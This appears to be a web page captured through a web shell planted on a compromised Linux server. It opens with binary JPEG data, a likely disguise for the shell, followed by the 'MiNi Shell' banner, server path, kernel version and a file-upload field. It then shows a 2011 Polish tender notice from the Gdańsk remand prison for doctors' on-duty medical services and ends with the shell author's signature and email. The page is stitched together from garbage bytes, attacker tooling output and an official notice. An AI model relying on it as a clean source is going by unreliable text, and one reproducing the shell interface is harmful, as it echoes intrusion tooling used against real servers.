JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111108/291133-N-2011.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 2/DSz/2011 na wykonywanie świadczeń zdrowotnych osobom pozbawionym wolności w ramach dyżurów lekarskich w Areszcie Śledczym w Gdańsku</b><br>
<b>Numer ogłoszenia: 291133 - 2011; data zamieszczenia: 08.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 2/DSz/2011 na wykonywanie świadczeń zdrowotnych osobom pozbawionym wolności w ramach dyżurów lekarskich w Areszcie Śledczym w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie świadczeń zdrowotnych osobom pozbawionym wolności w ramach dyżurów lekarskich na terenie Aresztu Śledczego w Gdańsku oraz wstępnych badań lekarskich przed osadzeniem w areszcie przez okres 12 miesięcy od dnia 01 stycznia 2012r. do dnia 31.12.2012r. na zasadach określonych w rozporządzeniu Ministra Zdrowia i Opieki Społecznej  z dnia 13.07.1998r. w sprawie umowy o udzielenie zamówienia na świadczenia zdrowotne (Dz. U. Z 1998r. Nr 93, poz. 592). Dyżury lekarskie pełnione są w ramach niniejszego zamówienia w dniach powszednich od godz. 15.30 do 7.30 dnia następnego, zaś w soboty, niedziele i święta od godz. 7.30 do 7.30 dnia następnego. Wykonawca zobowiązany będzie do pełnienia dyżurów w w/w godzinach w siedzibie ZOZ  Zamawiającego w Gdańsku przy ulicy Kurkowej 12 osobiście lub poprzez zlecenie dyżurów innym lekarzom. Lekarz podejmujący się pełnienia dyżuru winien posiadać prawo do wykonywania zawodu na terenie Rzeczypospolitej Polskiej, niezbędne kwalifikacje do realizacji zamówienia oraz inne wymagania określone w niniejszej specyfikacji. Liczba lekarzy świadczących usługi winna być dostosowana do potrzeb Zamawiającego i pokrywać się będzie z ustalonym grafikiem dyżurów, w tym również z uwzględnieniem okresów urlopów i innych przerw w świadczeniu pracy oraz przepisów o czasie pracy. Realizacja świadczeń musi odbywać się zgodnie z przepisami rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 13 lipca 1998r. w sprawie umowy o udzielenie zamówienia na świadczenia zdrowotne (Dz. U. Nr 93, poz. 592). 
W trakcie pełnienia dyżurów wykonawca będzie zobowiązany do udzielania świadczeń zdrowotnych osobom pozbawionym wolności na terenie AŚ Gdańsk oraz przyjmowanym do jednostki i prowadzenia niezbędnej dokumentacji medycznej dotyczącej udzielanych świadczeń z uwzględnieniem przepisów szczegółowych w tym dokumentacji wymaganej od zakładów opieki zdrowotnej podległych Ministrowi Sprawiedliwości. Wykonawca będzie zobowiązany przedstawić na minimum 5 dni przed rozpoczęciem dyżurów grafik dyżurowy zgodny z grafikiem przygotowanym przez administrację szpitala AŚ Gdańsk. Lekarze pełniący dyżury muszą posiadać pełne prawo do wykonywania zawodu na terenie Rzeczypospolitej Polskiej, być ubezpieczony zgodnie z przepisami rozporządzenia Ministra Finansów w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej lekarzy i lekarzy dentystów wykonujących zawód na terytorium Rzeczypospolitej Polskiej z dnia 26.04.2010r. Dz. U. Nr 78, poz. 515). Zakres świadczonej opieki medycznej ograniczony jest infrastrukturą i wyposażeniem Zamawiającego i odbywa się poza godzinami podstawowej ordynacji. Odpłatność za zlecone przez lekarza świadczenia zdrowotne osadzonym obciąża Areszt Śledczy w Gdańsku. Zamawiający zapewnia w trakcie dyżuru: pokój lekarski oraz pomieszczenia zabiegowe, obsadę pielęgniarską, dokumentację medyczną osadzonych, wyposażenie ZOZ-u, leki. Przy czym udostępniona lekarzowi dokumentacja stanowi wyłączną własność Zamawiającego. Przed rozpoczęciem dyżuru lekarz dyżurny zobowiązany jest do zapoznania się ze stanem chorych wymagających opieki medycznej. W trakcie pełnionego dyżuru lekarz udziela świadczeń zdrowotnych pacjentom na terenie ZOZ AŚ Gdańsk, wykonuje wstępne badania przed osadzeniem w AŚ Gdańsk, w uzasadnionych przypadkach zleca wyjazd pacjenta do zewnętrznych publicznych ZOZ (w sytuacjach nagłych zagrożenia życia lub zdrowia wymagających natychmiastowego udzielenia pomocy medycznej, niemożliwej do realizacji na terenie Aresztu Śledczego w Gdańsku), prowadzi raport lekarza dyżurnego w -Księdze raportów lekarza dyżurnego, prowadzi dokumentację medyczną dotyczącą osób pozbawionych wolności w zakresie udzielanej opieki i porad medycznych, udziela świadczeń zdrowotnych zgodnie z obowiązującymi zasadami i wiedzą  lekarską kierując się przy tym potrzebami racjonalnych skutków finansowych sprawowanej opieki. Wykonawca zobowiązany będzie do wykonania co najmniej 24 dyżurów w miesiącu . Wykonawca jest zobowiązany do posiadania ubezpieczenia od odpowiedzialności cywilnej na czas trwania umowy zgodnie z rozporządzeniem Ministra Finansów w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej lekarzy i lekarzy dentystów wykonujących zawód na terytorium Rzeczypospolitej Polskiej z dnia 26.04.2010r. (Dz. U. Nr 78, poz. 515). Lekarz dyżurny może pełnić dyżury wyłącznie po przeszkoleniu przez Zamawiającego w zakresie: opieki medycznej, prowadzenia dokumentacji oraz zasad poruszania się po terenie aresztu i bezpieczeństwa w kontaktach z osadzonymi. Na prośbę lekarza dyżurnego świadczenia zdrowotne udzielane osadzonemu mogą się odbyć w obecności funkcjonariusza z działu ochrony. Zapłata z tytułu pełnienia dyżurów będzie przekazywana Wykonawcy przez Zamawiającego na podstawie rozliczenia miesięcznego w terminie do 30 dni od daty przedłożenia prawidłowo sporządzonego rachunku potwierdzonego przez dyrektora ZOZ AŚ w Gdańsku. W przypadku braku możliwości pełnienia dyżuru przez wskazanego w grafiku lekarza dyżurnego Wykonawca jest zobowiązany zapewnić zastępstwo i poinformować o powyższym Zamawiającego. Osoba zastępująca powinna posiadać wszelkie niezbędne kwalifikacje do pełnienia dyżuru lekarskiego oraz spełniać wymogi nie mniejsze niż określone w niniejszej specyfikacji oraz posiadać obowiązkowe ubezpieczenie OC lekarzy zgodnie z przepisami szczegółowymi.
Zamówienie realizowane będzie od dnia 01.01.2012r. do dnia 31.12.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków stanowiacego załacznik do SIWZ nr 2/DSz/2011 oraz aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), posiadanie zezwolenia na prowadzenia działalności w zakresie przedmiotu zamówienia - wymagany jest oryginał lub kserokopia za zgodność z oryginałem zaświadczenia o wpisie do ewidencji działalności gospodarczej (ważne 6 miesięcy od dnia wystawienia), oryginał lub kserokopia za zgodność z oryginałem zaświadczenia o prawie do wykonywania zawodu lekarza na terytorium Rzeczypospolitej Polskiej wystawione przez Okręgową Radę Lekarską,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiacego załącznik do SIWZ nr 2/DSz/2011</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiacego załącznik do SIWZ nr 2/DSz/2011</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiacego załącznik do SIWZ nr 2/DSz/2011. oryginał lub kserokopia za zgodność z oryginałem zaświadczenia o prawie do wykonywania zawodu lekarza na terytorium Rzeczypospolitej Polskiej wystawione przez Okręgową Radę Lekarską,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie oświadczenia o spełnianiu warunków stanowiącego załacznik do SIWZ nr 2/DSz/2011 oraz dowód opłacenia polisy OC lekarzy zgodnie z przepisami rozporządzenia Ministra Finansów za okres objęty przedmiotowym zamówieniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Przed podpisaniem umowy Wykonawca jest obowiazany przedstawić wykaz lekarzy spełniajacych warunki określone w SIWZ, którzy będa pełnić dyżury lekarskie-muszą posiadać prawo do wykonywania zawodu lekarza na terytorium RP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy (np. zmiana stawek VAT-u, istotne zmiany dotyczące warunków wykonywania zawodu lekarza np. zmiany stawki obowiązkowego ubezpieczenia OC). Warunkiem takiej zmiany jest ich zaakceptowanie przez Zamawiającego i podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności. W razie niewykonania lub nienależytego wykonania umowy Wykonawca dostawca zobowiązany jest do  zapłacenia kary umownej  (2% wartości umowy) za opóźnienie lub rażące zaniedbanie realizacji zamówienia na zasadach ogólnych. Warunkiem zawarcia umowy w sprawie przedmiotowego zamówienia jest dostarczenie przez wykonawcę wykazu lekarzy, którzy będą uczestniczyć w wykonaniu zamówieniu wraz z dokumentami potwierdzającymi fakt posiadania przez nich odpowiednich kwalifikacji, prawa do wykonywania zawodu wraz z opłaceniem składki ubezpieczenia OC lekarzy zgodnie z przepisami wskazanymi w niniejszej specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, fax: (058) 302-51-25, mail: as_gdansk@sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 13:30, miejsce: Sekretariat AŚ Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com